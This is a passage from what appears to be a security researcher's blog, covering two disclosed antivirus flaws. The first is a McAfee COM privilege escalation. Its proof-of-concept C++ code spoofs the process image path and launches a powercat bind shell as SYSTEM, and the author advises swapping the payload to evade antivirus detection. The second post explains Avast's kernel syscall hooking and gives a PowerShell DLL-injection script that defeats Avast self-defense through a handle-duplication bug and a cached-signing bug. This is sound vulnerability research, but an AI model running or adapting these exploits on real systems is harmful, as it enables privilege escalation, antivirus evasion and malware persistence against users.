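    // Walk PEB->Ldr->InMemoryOrderModuleList looking for the entry that describes our own main module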
    auto pPeb = processBasicInformation.PebBaseAddress;
    auto pLdr = pPeb->Ldr;
    auto pLdrHead = &pLdr->InMemoryOrderModuleList;
    auto pLdrNext = pLdrHead->Flink;

    while (pLdrNext != pLdrHead)
    {
        PLDR_DATA_TABLE_ENTRY LdrEntry = CONTAINING_RECORD(pLdrNext, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        if (LdrEntry->DllBase == moduleBase)
        {
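            // Overwrite FullDllName: ValidateModule resolves the caller's path via GetModuleFileNameExW, which reads this field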
            LdrEntry->FullDllName = usImagePath;
            break;
        }

        pLdrNext = LdrEntry->InMemoryOrderLinks.Flink;
    }
}

Thus, in order to bypass self-defense, it is necessary to call the above function MasqueradeImagePath with the path to any McAfee-signed binary as the argument before the first COM proxy call is made:

constexpr auto McLaunchExePath =
    LR"(C:\Program Files\McAfee\CoreUI\Launch.exe)"; // Your/path/to/Launch.exe
MasqueradeImagePath(McLaunchExePath);

0x07: Exploitation

Summarizing all the steps together, it turns out that for successful exploitation we need to do the following:

  1. Instantiate the CoManageOem Class COM-object in the McAWFwk service, get a marshalled pointer to it and query the IMcClassFactory interface of the factory with ::CoGetClassObject(77b97c6a-cd4e-452c-8d99-08a92f1d8c83, …, fd542581-722e-45be-bed4-62a1be46af03, &pMcClassFactory);
  2. Masquerade the PEB to bypass the ProxyStub check with MasqueradeImagePath;
  3. Create the encapsulated ManageOem Class COM-object, get a marshalled pointer to it and query the IManageOem interface of the object with pMcClassFactory->InternalCreateObject(9b6c414a-799d-4506-87d1-6eb78d0a3580, &pManageOem);
  4. Call IManageOem::RunProgram to run a shell bind TCP listener on localhost:12345 using powershell.exe and powercat.ps1 via pManageOem->RunProgram(“powershell.exe”, “. .\powercat.ps1;powercat -l -p 12345 -ep”);
  5. Connect to the listener and execute shell commands as SYSTEM with . .\powercat.ps1;powercat -c 127.0.0.1 -p 12345.

Here is a shortened version of the code for exploiting the vulnerability; the full version of the PoC is available on GitHub:

constexpr auto McLaunchExePath =
    LR"(C:\Program Files\McAfee\CoreUI\Launch.exe)"; // Your/path/to/Launch.exe

class __declspec(uuid("fd542581-722e-45be-bed4-62a1be46af03")) IMcClassFactory :
    public IUnknown
{
public:
    virtual HRESULT __stdcall InternalCreateObject(
        _In_ REFIID riid,
        _COM_Outptr_ void **ppvObject);
};

class __declspec(uuid("9b6c414a-799d-4506-87d1-6eb78d0a3580")) IManageOem :
    public IDispatch
{
public:
    virtual HRESULT Proc7(/* Stack Offset: 8 */ /*[Out]*/ BSTR *p0);
    virtual HRESULT Proc8(/* Stack Offset: 8 */ /*[Out]*/ BSTR *p0);
    virtual HRESULT Proc9(/* Stack Offset: 8 */ /*[Out]*/ BSTR *p0);
    virtual HRESULT Proc10(/* Stack Offset: 8 */ /*[Out]*/ BSTR *p0);
    virtual HRESULT Proc11(/* Stack Offset: 8 */ /*[Out]*/ short *p0);
    virtual HRESULT Proc12(/* Stack Offset: 8 */ /*[In]*/ short p0);
    virtual HRESULT Proc13(
        /* Stack Offset: 8 */ /*[In]*/ BSTR p0,
        /* Stack Offset: 16 */ /*[Out]*/ BSTR *p1);
    virtual HRESULT RunProgram(
        /* Stack Offset: 8 */ /*[In]*/ BSTR bstrExePath,
        /* Stack Offset: 16 */ /*[In]*/ BSTR bstrCmdLine,
        /* Stack Offset: 24 */ /*[Out]*/ /* ENUM16 */ int *returnCode);
    /* Other methods */
};

_COM_SMARTPTR_TYPEDEF(IMcClassFactory, __uuidof(IMcClassFactory));
_COM_SMARTPTR_TYPEDEF(IManageOem, __uuidof(IManageOem));

int main()
{
    try
    {
        HRESULT hr = ::CoInitializeEx(0, COINIT_MULTITHREADED);
        if (FAILED(hr))
            throw std::runtime_error("CoInitializeEx failed. Error: " + std::to_string(hr));
        auto coUninitializeOnExit = wil::scope_exit([] {::CoUninitialize(); });

        const GUID CLSID_CoManageOem =
            { 0x77b97c6a, 0xcd4e, 0x452c, { 0x8d, 0x99, 0x08, 0xa9, 0x2f, 0x1d, 0x8c, 0x83 } };
        IMcClassFactoryPtr pMcClassFactory;

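        // Step 1: get the IMcClassFactory class object from the McAWFwk service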
        hr = ::CoGetClassObject(
            CLSID_CoManageOem,
            CLSCTX_LOCAL_SERVER,
            nullptr,
            IID_PPV_ARGS(&pMcClassFactory));
        if (FAILED(hr))
            throw std::runtime_error("CoGetClassObject failed. Error: " + std::to_string(hr));

        const auto thisModulePath = fs::path(wil::GetModuleFileNameW<std::wstring>(NULL));
        auto thisModuleParentDirectoryPath = thisModulePath.parent_path();

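        // Step 2: masquerade our image path as a McAfee-signed binary before the first ProxyStub call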
        auto mcAfeeSignedImagePath = McLaunchExePath;
        MasqueradeImagePath(mcAfeeSignedImagePath);

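        // Step 3: ask the factory for the encapsulated ManageOem object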
        IManageOemPtr pManageOem;

        hr = pMcClassFactory->InternalCreateObject(
            __uuidof(pManageOem), reinterpret_cast<LPVOID *>(&pManageOem));
        if (FAILED(hr))
            throw std::runtime_error("InternalCreateObject failed. Error: " + std::to_string(hr));

        auto cmdLineString = std::wstring(LR"(-nop -ep bypass -c ". )") + (thisModuleParentDirectoryPath / L"powercat.ps1").wstring() + LR"(;powercat -l -p 12345 -ep")";

        auto exePath = ::SysAllocString(LR"(C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe)");
        auto cmdLine = ::SysAllocString(cmdLineString.c_str());
        auto freeBstrStringsOnExit =
            wil::scope_exit([exePath, cmdLine] { ::SysFreeString(exePath); ::SysFreeString(cmdLine); });

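        // Step 4: run powershell.exe with the powercat bind-shell command line as SYSTEM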
        int errorCode;

        hr = pManageOem->RunProgram(exePath, cmdLine, &errorCode);
        if (FAILED(hr))
            throw std::runtime_error("RunProgram failed. Error: " + std::to_string(hr));
    }
    catch (const std::exception &e)
    {
        std::cerr << "Exception: " << e.what() << std::endl;
        return -1;
    }

    return 0;
}

And below is a demo of the PoC:

Note: AV engines have recently been detecting “powercat” and quarantining it. So for demonstration purposes the script must be added to the exclusions, and to work in real life the payload must be changed to something slightly less well-known.

0x08: Conclusion

As you can see, the reported vulnerability is quite simple, but not obvious in terms of finding, analyzing and exploiting it. And to simplify the task of searching for vulnerabilities in COM-objects, modern, powerful and flexible tooling comes to the rescue - OVDN. I hope this post will help you learn OVDN and start using it.

In addition, note that the vulnerability wouldn't have been found if we had stopped at a static analysis of the attack surface. It's always important to check the expectations you form from static attack surface analysis with a dynamic test - the results will surprise you :)

0x09: Disclosure Timeline

  • 2020-11-03 Initial report sent to McAfee.
  • 2020-11-04 Initial response from McAfee stating the report is being reviewed.
  • 2020-11-24 McAfee triaged the report as a valid issue and started work on a fix.
  • 2021-02-10 McAfee released a patched version of the product and published the security bulletin.
  • 2021-05-18 This report has been disclosed.

Hooking System Calls in Windows 11 22H2 like Avast Antivirus. Research, analysis and bypass

8 December 2022 at 08:00

0x00: Introduction

Sometimes ago I’ve researched Avast Free Antivirus (post about found vulnerabilities coming soon), and going through the chain of exploitation I needed to bypass self-defense mechanism. Since antivirus self-defense isn’t, in my opinion, a security boundary, bypassing this mechanism isn’t a vulnerability, and therefore I didn’t consider it so interesting to write about it in my blog. But when I stumbled upon the post by Yarden Shafir, I decided that this post could still be useful to someone. Hope you’ll enjoy reading it!

TL;DR: In this post I'll show an Avast self-defense bypass, but I'll focus not on the result but on the process: how I learned how the security feature is implemented, discovered a new undocumented way to intercept all system calls without a hypervisor and without a PatchGuard-triggered BSOD, and, finally, based on the knowledge gained, implemented a bypass.

0x01 Self-Defense Overview

Every antivirus (AV) self-defense is a proprietary undocumented mechanism, so no official documentation exists. However, I will try to guide you through the most important common core aspects. The details here should be enough to understand the next steps of the research.

Typical antivirus self-protection is a mechanism similar in purpose to Protected Process Light (PPL): developers try to move the product's processes into their own security domain, but without using special certificates (the protected process (light) verification OID in the EKU), to make it impossible for an attacker to tamper with or terminate those processes. That is, self-protection is similar in function to PPL, but is not a part or an extension of it - EPROCESS.Protection doesn't contain flags set by the AV, and therefore RtlTestProtectedAccess cannot prevent access to the secured objects. So the developers have to do the following on their own:

  1. Assign and manage process trust tags (on process creation, on suspicious actions);
  2. Intercept operating system (OS) operations that are important from the point of view of invasive impact (opening processes, threads, files for writing) and check if they violate the rules of the selected policy.

The first point is simple and clear - it's obvious what bugs to look for there (e.g. CVE-2021-45339) - but the second point requires clarification. What, and how, do antiviruses intercept? Due to PatchGuard and compatibility requirements, developers have rather limited options, namely a small number of documented hooks. And not many of them can help defend a process:

  1. Ob-Callbacks - prevent opening a process or thread for write access;
  2. Minifilter driver - prevents writing to the product's files;
  3. Some user-mode hooks - other preventions.

I’m not going to delve into detail of how this works under the hood, but if you’re not familiar with these mechanisms, I encourage you to follow the links above. On this, we consider the gentle introduction into the self-defense of the antivirus over and we can proceed to the research.

0x02 Probing Avast Self-Defense

When you need to interact with OS objects, NtObjectManager is an excellent choice. This is a PowerShell module written by James Forshaw, and it is a powerful wrapper around a very large number of OS APIs. With it, you can also check how processes are protected by self-defense and whether the AV driver mechanisms give more access than they should. I started with a simple attempt to open Avast's UI process AvastUI.exe:

Open process AvastUI.exe

The picture above shows that in general everything works predictably - the WRITE rights are “cut” (1). It's a bit risky that they leave the VmRead (2) access right, but that is not so easy to exploit, so I decided to look further:

Copy handle of process AvastUI.exe

I tried to duplicate the restricted handle with permissions up to AllAccess (1), and surprisingly it worked, even though the trick is pretty trivial. Once an attacker has a handle with write permissions, with self-defense based purely on Ob-Callbacks nothing restricts them from performing destructive actions against the protected process, because the access check and the Ob-Callbacks only happen once, when the handle is created, and are not involved in subsequent syscalls that use the acquired handle. At this point you could inject code, but for the test it was enough to simply terminate the process, which I did. The result was unexpected - the process would not terminate (2), an access error occurred, even though my handle should have allowed the requested action.
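
For reference, here is a minimal Win32 sketch of the same handle-duplication trick (my assumed equivalent of the Copy-NtObject call from the screenshot, not Avast-specific code):

#include <windows.h>
#include <cstdio>
#include <cstdlib>

int main(int argc, char* argv[])
{
    if (argc < 2) return 1;
    DWORD pid = std::strtoul(argv[1], nullptr, 10);      // PID of AvastUI.exe

    // Open with the limited rights the Ob-callback leaves us.
    HANDLE hLimited = ::OpenProcess(
        PROCESS_QUERY_LIMITED_INFORMATION | PROCESS_VM_READ, FALSE, pid);
    if (!hLimited) return 1;

    // Duplicate the handle back into our own process, asking for full access.
    // As the experiment above shows, this request is not stripped the way the
    // rights on the original open were.
    HANDLE hFull = nullptr;
    if (!::DuplicateHandle(::GetCurrentProcess(), hLimited,
                           ::GetCurrentProcess(), &hFull,
                           PROCESS_ALL_ACCESS, FALSE, 0))
        return 1;

    std::printf("full-access handle: %p\n", hFull);
    return 0;
}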

It is obvious that the AV somehow interferes with the termination of the process and prohibits it. And this is done not at the handle level via Ob-Callbacks, but at the API call itself, which means TerminateProcess is intercepted somewhere. I checked whether it was a user-mode hook, and it turned out that it wasn't. Strange and interesting…

0x03 Researching Syscall Hook

First of all, I studied the existing ways to intercept syscalls. It is widely known that system call hooking has been impossible on x64 systems since 2005 due to PatchGuard. But Avast obviously intercepts them. Had I missed something? I found a couple of interesting articles (here and here), but all these tricks were undocumented and only confirmed that in modern Windows syscall interception isn't a documented feature and is formally inaccessible even to antiviruses.

Then I traced the aforementioned syscall (TerminateProcess on AvastUI.exe) and found that before each call to the syscall handler from the SSDT, a call to PerfInfoLogSysCallEntry occurs, during which the address of the handler on the stack gets replaced (the handler address is stored on the stack, then PerfInfoLogSysCallEntry is called, and then the address is taken off the stack and called):

Call PerfInfoLogSysCallEntry

In the screenshot above, you can see that we are in the syscall dispatcher (1), before routing to a specific handler. The kernel code puts the address of the process termination handler (nt!NtTerminateProcess) onto the stack at offset @rsp + 0x40 (2), then PerfInfoLogSysCallEntry (3) is called; after returning from the call, the handler address is popped back from the stack (4) and the handler is called directly (5).

And if you follow the code further, then after calling PerfInfoLogSysCallEntry you can see the following picture:

Call replaced syscall

The address aswbidsdriver + 0x20f0 from the Avast driver (3) appears in the @rax register, and control is transferred to it instead of the original handler (2).

This syscall interception technique is not like the ones mentioned above. But already we can see that some “magic” happens in the function PerfInfoLogSysCallEntry, and the name of this function is unique enough to search for information about it on Google.

The first search result leads to the InfinityHook project, which implements exactly this kind of x64 system call interception. What luck! 😉 You can read in detail how it works in its README.md, and here I'll give the most important part:

At +0x28 in the _WMI_LOGGER_CONTEXT structure, you can see a member called GetCpuClock. This is a function pointer that can be one of three values based on how the session was configured: EtwGetCycleCount, EtwpGetSystemTime, or PpmQueryTime

The “Circular Kernel Context Logger” context is found by signature, and its GetCpuClock pointer is replaced. But there is one problem: on the latest OS this code doesn't work. Why? The project has an issue from which it can be understood that the GetCpuClock member of the _WMI_LOGGER_CONTEXT structure is no longer a function pointer but a regular flag. We can check this by looking at the memory of the object in Windows 11, and indeed there is nothing to replace in this member - instead of a function pointer we observe an unsigned 8-bit integer:

GetCpuClock member

Then how do they take control? I set a data access breakpoint on the modification of the syscall handler address inside PerfInfoLogSysCallEntry (something like “ba w8 /t @$thread @rsp + 40h”) to see exactly what code is replacing the original syscall handler:

Replace original syscall

The screenshot above shows that code from the aswVmm module at offset 0xdfde (1) replaces the address of the syscall handler on the stack (2) with the address aswbidsdriver + 0x20f0 (3). If we reverse further to see why this code is called from EtwpReserveTraceBuffer, we can see that the handler at nt!HalpPerformanceCounter + 0x70 is called when logging the ETW event:

HalpPerformanceCounter calls QueryCounter

Accordingly, when checking the value at that offset in this undocumented structure (rumor has it that this offset holds the structure's QueryCounter member), you can see that it points to an Avast symbol:

HalpPerformanceCounter.QueryCounter

Now it became clear how the syscall interception is implemented. I searched the Internet and found some public information about this kind of interception here, and even code that implements the approach. In this code you can see how to find the private structure nt!HalpPerformanceCounter, and described step by step it looks like this:

  1. Find the _WMI_LOGGER_CONTEXT of the Circular Kernel Context Logger ETW provider by searching for the signature of the EtwpDebuggerData global variable in the .data section of the kernel image, then use the knowledge that this variable is followed by an array of providers and that the desired one has index 2;
  2. Next, the provider's flags are configured for syscall logging, and the flag is set to use KeQueryPerformanceCounter, which in turn calls HalpPerformanceCounter.QueryCounter;
  3. HalpPerformanceCounter.QueryCounter is replaced directly. To do this, the variable has to be found: the KeQueryPerformanceCounter function that uses it is disassembled and the address of the variable is extracted from it by signature. Then the member of the undocumented structure is replaced with the hook;
  4. The provider is started if it was stopped before.

0x04 Self-Defense Bypass

Now we know that Avast implements self-defense by intercepting syscalls in the kernel, and we understand how these interceptions are implemented. Inside the hooks, logic obviously decides whether to allow a specific process to execute a specific syscall with the given parameters, for example: can the Maliscious.exe process execute TerminateProcess with a handle to the AvastUI.exe process? How can we overcome this defense? I see 3 options:

  1. Break the hooks themselves:
    • The replaced HalpPerformanceCounter.QueryCounter is called not only in syscall handling, but also on other events. So the Avast driver somehow distinguishes these cases. You can try to call a syscall in such a way that the Avast driver does not understand that it is a syscall and does not replace it with its own routine;
    • Or turn off hooking.
  2. Find a bug in the Avast logic for determining prohibited operations (for example, find a process from the list of exceptions and mimic it);
  3. Use syscalls that are not intercepted.

The last option seems the simplest, since the developers have surely forgotten to intercept and prohibit some important function. If this approach fails, we can try harder and implement option 1 or 2.

To understand whether the developers have forgotten some function, we need to enumerate the names of the functions they intercept. If you look at the xrefs to the function aswbidsdriver + 0x20f0, to which control is redirected instead of the original syscall handler in the screenshot above, you can see that its address sits in an array together with the name of the syscall being intercepted. It looks like this:

Hooked API array

It is logical to assume that by going through all the elements of this array we can get the names of all the intercepted system calls. Doing exactly that, we get the following list of system calls that Avast intercepts, analyzes, and possibly blocks:

NtContinue
NtSetInformationThread
NtSetInformationProcess
NtWriteVirtualMemory
NtMapViewOfSection
NtMapViewOfSectionEx
NtResumeThread
NtCreateEvent
NtCreateMutant
NtCreateSemaphore
NtOpenEvent
NtOpenMutant
NtOpenSemaphore
NtQueryInformationProcess
NtCreateTimer
NtOpenTimer
NtCreateJobObject
NtOpenJobObject
NtCreateMailslotFile
NtCreateNamedPipeFile
NtAddAtom
NtFindAtom
NtAddAtomEx
NtCreateSection
NtOpenSection
NtProtectVirtualMemory
NtOpenThread
NtSuspendThread
NtTerminateThread
NtTerminateProcess
NtSuspendProcess
NtNotifyChangeKey
NtNotifyChangeMultipleKeys

Let me remind you that initially we wanted to bypass self-defense, and for the purposes of a quick demonstration we simply tried to kill the process. But now back to the original plan - injection. We need to find a way to inject that simply does not use the functions listed above. That's all! 😉 There are a lot of injection methods and many resources where they are described. I found a rather old, but still relevant, list in Elastic's article “Ten process injection techniques: A technical survey of common and trending process injection techniques” (after completing this research, I found another interesting post “'Plata o plomo' code injections/execution tricks”; I highly recommend both the post and the blog). It covers the most popular injection techniques in Windows. So which of these can be applied so that it works and Avast's self-defense cannot prevent the code from being injected?

From the list of intercepted syscalls it is clear that the developers seem to have read this article and taken care of mitigating injection into their processes. For example, the very first classic technique, “CLASSIC DLL INJECTION VIA CREATEREMOTETHREAD AND LOADLIBRARY”, is impossible. Although the name of the technique mentions only CreateRemoteThread and LoadLibrary, WriteProcessMemory is still needed there, and that is the bottleneck in our case - Avast intercepts NtWriteVirtualMemory, so the technique will not work in its original form. But what if we don't write anything to the remote process and instead use strings that already exist in it? I got the following idea:

  1. Find in the process memory (we have a handle, and such actions are not intercepted) a string representing a path where an attacker can write his module. The most reliable way seemed to be to look in the PEB among the environment variables for a string like “LOCALAPPDATA=C:\Users\User\AppData\Local”: this path is definitely writable and the memory will not be accidentally freed at runtime, i.e. the exploit will be more reliable;
  2. Copy module to inject to C:\Users\User\AppData\Local.dll;
  3. Using the handle copying bug, get all access handle to process AvastUI.exe;
  4. Find the address of kernel32!LoadLibraryA (for this, thanks to KnownDlls, you don’t even need to read the memory, although we can);
  5. Call CreateRemoteThread (it is not intercepted) with the procedure address of LoadLibraryA and, as the argument, the string “C:\Users\User\AppData\Local”. Since the path has no extension, according to the documentation LoadLibraryA appends “.dll” itself;
  6. Profit!

Expressed in PowerShell, the scenario looks like this (in addition to the previously mentioned NtObjectManager, the script uses the Search-Memory cmdlet from the PSMemory module):

$avastUIs = Get-Process -Name AvastUI
$avastUI = $avastUIs[0]

$localAppDataStrings = $avastUI | Search-Memory -Values @{String='LOCALAPPDATA=' + $env:LOCALAPPDATA}
$pathAddress = $localAppDataStrings.Group[0].Address + 'LOCALAPPDATA='.Length  #[1]

Copy-Item -Path .\MessageBoxDll.dll -Destination ($env:LOCALAPPDATA + '.dll') #[2]

$process = Get-NtProcess -ProcessId $avastUI.Id
$process2 = Copy-NtObject -Object $process -DesiredAccess GenericAll #[3]

$kernel32Lib = Import-Win32Module -Path 'kernel32.dll'
$loadLibraryProc = Get-Win32ModuleExport -Module $kernel32Lib -ProcAddress 'LoadLibraryA' #[4]

$thread = New-NtThread -StartRoutine $loadLibraryProc -Argument $pathAddress -Process $process2 #[5]

And if we run this code, then… nothing happens. More precisely, a thread is created and it tries to load the module, but the module does not load. Worse, the loading code, judging by the call stack in ProcMon, is intercepted by the aswSP.sys driver (Avast Self Protection), which, judging by the directory accesses performed via CI.dll, tries to verify the module's signature:

LoadLibrary failed

It’s incredible! Avast not only uses undocumented syscall hooks, but also uses the undocumented kernel-mode library CI.dll to validate the signature in the kernel. This is a very brave and cool feature, but for us it brings problems: we either need to change the injection scheme to fileless, or now look for a bug in the signature verification mechanism as well. I chose the second.

0x05 Cached Signing Bug

AvastUI.exe is an Electron-based application and therefore has a specific process model – one main process and several renderer processes:

AvastUI process model

The unsuccessful injection attempt in the previous section targeted the main process. But then, while thinking it over, I tried to re-run the script specifying one of the child processes as the target and… the injection worked.

AvastUI pwned

And if we then try to inject into the main process again, we succeed and no signature checks are performed:

LoadLibrary succeeded

It’s strange, but cool that the injection works. And this means that the article is nearing completion. 😊 But I still want to understand what’s going on.

After the renderer process loads the unsigned test library, the Kernel Extended Attribute $KERNEL.PURGE.ESBCACHE is added to the file:

$f = Get-NtFile -Path ($env:LOCALAPPDATA + '.dll') -Win32Path -Access GenericRead -ShareMode Read
$f.GetEa()

Entries                                                     Count
-------                                                     -----
{Name: $KERNEL.PURGE.ESBCACHE - Data Size: 69 - Flags None}     1

This is a special attribute that can only be set from the kernel using the FsRtlSetKernelEaFile function and is removed whenever the file is modified. CI stores the signature verification status in this attribute, and if it is present, re-verification does not occur - the result of the previous check is reused. So it is clear that when the module is loaded into the renderer process, a bug in the self-protection driver (probably aswSP.sys; in this article we won't figure out exactly which component is at fault, but the reader can look in ProcMon at the call stack of the SetEAFile operation on the file and reverse why it is invoked) causes the Kernel Extended Attribute with validated signature information for CI to be set on an unsigned file. After that, this file can be loaded into any other process that relies on the result of the previous “signature check”. Let's see what is written in the attribute (NtObjectManager will help us here again):

$f.GetCachedSigningLevelFromEa()

Version             : 3
Version2            : 2
USNJournalId        : 133143369490576857
LastBlackListTime   : 4/6/2022 2:40:59 PM
ExtraData           : {Type DGPolicyHash - Algorithm Sha256 - Hash 160348839847BC9E112709549A0739268B21D1380B9D89E0CF7B4EB68CE618A7}
Flags               : 32770
SigningLevel        : DeviceGuard
Thumbprint          :
ThumbprintBytes     : {}
ThumbprintAlgorithm : Unknown

The signature of the unsigned file is marked as valid at the DeviceGuard (DG) level, so it's understandable why the main process loads it. In addition, this bug may allow unsigned code to be executed on a DG-protected system. Although code already needs to be running to trigger the bug, it can be used as a stage in an exploitation chain for executing arbitrary code on a DG system.

Summing up, the self-defense bypass script above is valid, but it must be applied not to AvastUI's main process but to one of its children. If you still want to inject into the main process, it's enough to first inject into any non-main AvastUI process - this sets the Kernel EA on the unsigned file to a passing signature verification result, and after that you can inject the same module into the main process: the presence of the attribute tells the loader that the file is signed, and it loads successfully.

After getting the ability to execute code in the context of AvastUI, we have several advantages:

  1. A larger attack surface is opened on AV interfaces - only trusted processes have access to many of them;
  2. AV most likely whitelists all actions of the code in a trusted process, for example, you can encrypt all files on the disk without interference;
  3. The user cannot terminate the trusted process, and it may already be hosting malicious code.

But more on that in future posts.

0x06 Conclusions

As a result of this work, we have a process-handle duplication bug in the current latest version of Avast Free Antivirus (22.11.6041, build 22.11.7716.762); we know that Avast hooks syscalls in the kernel and how those hooks work on a fully updated Windows 11 22H2; we investigated which hooks Avast installs, developed an injection that bypasses the interception mechanism, discovered signature verification in the Avast core using CI.dll functions, found a bug in how the cached signing level is set, and, using all of this, we are finally able to inject code into the trusted, antivirus-protected AvastUI.exe process.
